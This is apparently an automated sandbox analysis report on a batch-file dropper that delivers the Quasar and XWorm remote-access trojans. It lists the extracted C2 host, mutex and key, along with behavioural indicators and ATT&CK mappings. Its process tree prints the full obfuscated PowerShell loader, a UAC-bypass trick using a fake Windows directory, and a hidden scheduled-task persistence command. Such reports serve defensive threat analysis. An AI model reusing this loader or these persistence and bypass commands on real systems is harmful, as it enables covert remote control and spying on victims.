quasar | d1a6da3bb5b455c45056ff4b7e29270c29728e6e1add468a9a3e8ff88d6c3afb

Analysis

max time kernel
149s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
11-11-2024 03:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d1a6da3bb5b455c45056ff4b7e29270c29728e6e1add468a9a3e8ff88d6c3afb.bat
Size

156KB
MD5

c88c0f71749f8575068070333359f5b5
SHA1

af3cbd68266ab3b90bef8db45f8e22e1f4d9d121
SHA256

d1a6da3bb5b455c45056ff4b7e29270c29728e6e1add468a9a3e8ff88d6c3afb
SHA512

da549a0f953591baf4021dfb09f6b3afc0ff93dc58c430b90688583c5c43808393506389d97668b5f5d923b8258154d0a66c7f33ddaef7667bbf05fb45ef2fa4
SSDEEP

3072:pvmWfV9iV9C860i3eCYGBZ/Mf89esLbgVQBF7t+a39Qn4bo:Rdf2+nRBCf89/LESJSko

Score

10^/10

quasar xworm office04 defense_evasion execution rat spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

walkout.ddnsgeek.com:8080

Mutex

27391f85-a482-471a-b2cd-1f8ab5bde32e

Attributes

encryption_key
6469F8C5BA9A2CFDCF4A3F1651D1E92DBEA41117
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Extracted

Family

xworm

Version

5.0

Mutex

MQh1F5RA5WIKm4RA

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/2668-127-0x0000026973740000-0x000002697374E000-memory.dmp	family_xworm

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/932-92-0x00000217390C0000-0x00000217393E4000-memory.dmp	family_quasar

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 47 IoCs

flow	pid	Process
15	2668	powershell.exe
20	2248	powershell.exe
24	932	powershell.exe
26	932	powershell.exe
28	932	powershell.exe
33	2668	powershell.exe
35	2668	powershell.exe
36	2668	powershell.exe
49	2668	powershell.exe
51	2668	powershell.exe
52	2668	powershell.exe
53	2668	powershell.exe
54	2668	powershell.exe
55	2668	powershell.exe
56	2668	powershell.exe
57	2668	powershell.exe
58	2668	powershell.exe
59	2668	powershell.exe
63	2668	powershell.exe
64	2668	powershell.exe
65	2668	powershell.exe
66	2668	powershell.exe
67	2668	powershell.exe
68	2668	powershell.exe
69	2668	powershell.exe
70	2668	powershell.exe
71	2668	powershell.exe
73	2668	powershell.exe
76	2668	powershell.exe
78	2668	powershell.exe
79	2668	powershell.exe
80	2668	powershell.exe
81	2668	powershell.exe
82	2668	powershell.exe
83	2668	powershell.exe
84	2668	powershell.exe
85	2668	powershell.exe
86	2668	powershell.exe
87	2668	powershell.exe
88	2668	powershell.exe
89	2668	powershell.exe
90	2668	powershell.exe
91	2668	powershell.exe
92	2668	powershell.exe
93	2668	powershell.exe
94	2668	powershell.exe
95	2668	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3476	powershell.exe
932	powershell.exe
2024	powershell.exe
1476	powershell.exe
2032	powershell.exe
4668	powershell.exe
624	powershell.exe
632	powershell.exe
3212	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4404	ComputerDefaults.exe

Loads dropped DLL 1 IoCs

pid	Process
4404	ComputerDefaults.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
2668	powershell.exe
2668	powershell.exe
624	powershell.exe
624	powershell.exe
932	powershell.exe
932	powershell.exe
932	powershell.exe
2248	powershell.exe
2248	powershell.exe
2248	powershell.exe
632	powershell.exe
632	powershell.exe
632	powershell.exe
3212	powershell.exe
3212	powershell.exe
3212	powershell.exe
4748	powershell.exe
4748	powershell.exe
4748	powershell.exe
2024	powershell.exe
2024	powershell.exe
2024	powershell.exe
1476	powershell.exe
1476	powershell.exe
1476	powershell.exe
4724	powershell.exe
4724	powershell.exe
4724	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
4668	powershell.exe
4668	powershell.exe
4668	powershell.exe
3476	powershell.exe
3476	powershell.exe
3476	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	624	powershell.exe
Token: SeDebugPrivilege	932	powershell.exe
Token: SeDebugPrivilege	2248	powershell.exe
Token: SeDebugPrivilege	632	powershell.exe
Token: SeDebugPrivilege	3212	powershell.exe
Token: SeDebugPrivilege	4748	powershell.exe
Token: SeIncreaseQuotaPrivilege	4748	powershell.exe
Token: SeSecurityPrivilege	4748	powershell.exe
Token: SeTakeOwnershipPrivilege	4748	powershell.exe
Token: SeLoadDriverPrivilege	4748	powershell.exe
Token: SeSystemProfilePrivilege	4748	powershell.exe
Token: SeSystemtimePrivilege	4748	powershell.exe
Token: SeProfSingleProcessPrivilege	4748	powershell.exe
Token: SeIncBasePriorityPrivilege	4748	powershell.exe
Token: SeCreatePagefilePrivilege	4748	powershell.exe
Token: SeBackupPrivilege	4748	powershell.exe
Token: SeRestorePrivilege	4748	powershell.exe
Token: SeShutdownPrivilege	4748	powershell.exe
Token: SeDebugPrivilege	4748	powershell.exe
Token: SeSystemEnvironmentPrivilege	4748	powershell.exe
Token: SeRemoteShutdownPrivilege	4748	powershell.exe
Token: SeUndockPrivilege	4748	powershell.exe
Token: SeManageVolumePrivilege	4748	powershell.exe
Token: 33	4748	powershell.exe
Token: 34	4748	powershell.exe
Token: 35	4748	powershell.exe
Token: 36	4748	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeIncreaseQuotaPrivilege	2024	powershell.exe
Token: SeSecurityPrivilege	2024	powershell.exe
Token: SeTakeOwnershipPrivilege	2024	powershell.exe
Token: SeLoadDriverPrivilege	2024	powershell.exe
Token: SeSystemProfilePrivilege	2024	powershell.exe
Token: SeSystemtimePrivilege	2024	powershell.exe
Token: SeProfSingleProcessPrivilege	2024	powershell.exe
Token: SeIncBasePriorityPrivilege	2024	powershell.exe
Token: SeCreatePagefilePrivilege	2024	powershell.exe
Token: SeBackupPrivilege	2024	powershell.exe
Token: SeRestorePrivilege	2024	powershell.exe
Token: SeShutdownPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeSystemEnvironmentPrivilege	2024	powershell.exe
Token: SeRemoteShutdownPrivilege	2024	powershell.exe
Token: SeUndockPrivilege	2024	powershell.exe
Token: SeManageVolumePrivilege	2024	powershell.exe
Token: 33	2024	powershell.exe
Token: 34	2024	powershell.exe
Token: 35	2024	powershell.exe
Token: 36	2024	powershell.exe
Token: SeIncreaseQuotaPrivilege	2024	powershell.exe
Token: SeSecurityPrivilege	2024	powershell.exe
Token: SeTakeOwnershipPrivilege	2024	powershell.exe
Token: SeLoadDriverPrivilege	2024	powershell.exe
Token: SeSystemProfilePrivilege	2024	powershell.exe
Token: SeSystemtimePrivilege	2024	powershell.exe
Token: SeProfSingleProcessPrivilege	2024	powershell.exe
Token: SeIncBasePriorityPrivilege	2024	powershell.exe
Token: SeCreatePagefilePrivilege	2024	powershell.exe
Token: SeBackupPrivilege	2024	powershell.exe
Token: SeRestorePrivilege	2024	powershell.exe
Token: SeShutdownPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeSystemEnvironmentPrivilege	2024	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
932	powershell.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 3868 wrote to memory of 5068	3868	cmd.exe	87
PID 3868 wrote to memory of 5068	3868	cmd.exe	87
PID 3868 wrote to memory of 2668	3868	cmd.exe	88
PID 3868 wrote to memory of 2668	3868	cmd.exe	88
PID 2668 wrote to memory of 624	2668	powershell.exe	89
PID 2668 wrote to memory of 624	2668	powershell.exe	89
PID 2668 wrote to memory of 4388	2668	powershell.exe	94
PID 2668 wrote to memory of 4388	2668	powershell.exe	94
PID 2668 wrote to memory of 3676	2668	powershell.exe	96
PID 2668 wrote to memory of 3676	2668	powershell.exe	96
PID 3676 wrote to memory of 4404	3676	cmd.exe	98
PID 3676 wrote to memory of 4404	3676	cmd.exe	98
PID 4404 wrote to memory of 1344	4404	ComputerDefaults.exe	99
PID 4404 wrote to memory of 1344	4404	ComputerDefaults.exe	99
PID 1344 wrote to memory of 3512	1344	cmd.exe	101
PID 1344 wrote to memory of 3512	1344	cmd.exe	101
PID 4388 wrote to memory of 4416	4388	cmd.exe	103
PID 4388 wrote to memory of 4416	4388	cmd.exe	103
PID 4388 wrote to memory of 932	4388	cmd.exe	104
PID 4388 wrote to memory of 932	4388	cmd.exe	104
PID 3512 wrote to memory of 5104	3512	cmd.exe	105
PID 3512 wrote to memory of 5104	3512	cmd.exe	105
PID 3512 wrote to memory of 2248	3512	cmd.exe	106
PID 3512 wrote to memory of 2248	3512	cmd.exe	106
PID 932 wrote to memory of 632	932	powershell.exe	107
PID 932 wrote to memory of 632	932	powershell.exe	107
PID 2248 wrote to memory of 3212	2248	powershell.exe	108
PID 2248 wrote to memory of 3212	2248	powershell.exe	108
PID 2668 wrote to memory of 2280	2668	powershell.exe	111
PID 2668 wrote to memory of 2280	2668	powershell.exe	111
PID 2668 wrote to memory of 4748	2668	powershell.exe	113
PID 2668 wrote to memory of 4748	2668	powershell.exe	113
PID 2668 wrote to memory of 2024	2668	powershell.exe	115
PID 2668 wrote to memory of 2024	2668	powershell.exe	115
PID 2248 wrote to memory of 3952	2248	powershell.exe	117
PID 2248 wrote to memory of 3952	2248	powershell.exe	117
PID 2248 wrote to memory of 1476	2248	powershell.exe	118
PID 2248 wrote to memory of 1476	2248	powershell.exe	118
PID 2248 wrote to memory of 4724	2248	powershell.exe	121
PID 2248 wrote to memory of 4724	2248	powershell.exe	121
PID 2248 wrote to memory of 2032	2248	powershell.exe	123
PID 2248 wrote to memory of 2032	2248	powershell.exe	123
PID 3952 wrote to memory of 4152	3952	cmd.exe	125
PID 3952 wrote to memory of 4152	3952	cmd.exe	125
PID 3952 wrote to memory of 4668	3952	cmd.exe	126
PID 3952 wrote to memory of 4668	3952	cmd.exe	126
PID 4668 wrote to memory of 3476	4668	powershell.exe	127
PID 4668 wrote to memory of 3476	4668	powershell.exe	127

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\d1a6da3bb5b455c45056ff4b7e29270c29728e6e1add468a9a3e8ff88d6c3afb.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('CaBNPFufqG/Ty3CUXy9EKmZ0sYpFg7Md+6rAZ0/TxhU='); $aes_var.IV=[System.Convert]::FromBase64String('S/RVoa3ixa8FZY/sBX5WEg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$hsUWk=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$yefxQ=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$duVIf=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($hsUWk, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $duVIf.CopyTo($yefxQ); $duVIf.Dispose(); $hsUWk.Dispose(); $yefxQ.Dispose(); $yefxQ.ToArray();}function execute_function($param_var,$param2_var){ IEX '$jXYNL=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$GLWuz=$jXYNL.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$GLWuz.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$AfZnh = 'C:\Users\Admin\AppData\Local\Temp\d1a6da3bb5b455c45056ff4b7e29270c29728e6e1add468a9a3e8ff88d6c3afb.bat';$host.UI.RawUI.WindowTitle = $AfZnh;$BPwyt=[System.IO.File]::ReadAllText($AfZnh).Split([Environment]::NewLine);foreach ($MIYkU in $BPwyt) { if ($MIYkU.StartsWith('itiQGYtwhhNApDlOfuVM')) { $whOtj=$MIYkU.Substring(20); break; }}$payloads_var=[string[]]$whOtj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
  2⤵
  PID:5068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      4⤵
      PID:4416
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:932
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:632
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3676
  - - C:\Windows \System32\ComputerDefaults.exe
      "C:\Windows \System32\ComputerDefaults.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:4404
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1344
      - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('CaBNPFufqG/Ty3CUXy9EKmZ0sYpFg7Md+6rAZ0/TxhU='); $aes_var.IV=[System.Convert]::FromBase64String('S/RVoa3ixa8FZY/sBX5WEg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$hsUWk=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$yefxQ=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$duVIf=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($hsUWk, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $duVIf.CopyTo($yefxQ); $duVIf.Dispose(); $hsUWk.Dispose(); $yefxQ.Dispose(); $yefxQ.ToArray();}function execute_function($param_var,$param2_var){ IEX '$jXYNL=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$GLWuz=$jXYNL.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$GLWuz.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$AfZnh = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $AfZnh;$BPwyt=[System.IO.File]::ReadAllText($AfZnh).Split([Environment]::NewLine);foreach ($MIYkU in $BPwyt) { if ($MIYkU.StartsWith('itiQGYtwhhNApDlOfuVM')) { $whOtj=$MIYkU.Substring(20); break; }}$payloads_var=[string[]]$whOtj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
        7⤵
        
        PID:5104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        7⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3212
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
        9⤵
        
        PID:4152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2032
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
    3⤵
    PID:2280
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\d1a6da3bb5b455c45056ff4b7e29270c29728e6e1add468a9a3e8ff88d6c3afb')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SCV.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3f01549ee3e4c18244797530b588dad9

SHA1
3e87863fc06995fe4b741357c68931221d6cc0b9

SHA256
36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

SHA512
73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
73fa848e547ed3809533cd470b39d3a2

SHA1
b01d49092043ec35e5a7f51b59c5d915b7485002

SHA256
3acf67ffc528fc539ca6f077532dc6148ff9cd38d6129a5011c8c511a13e4590

SHA512
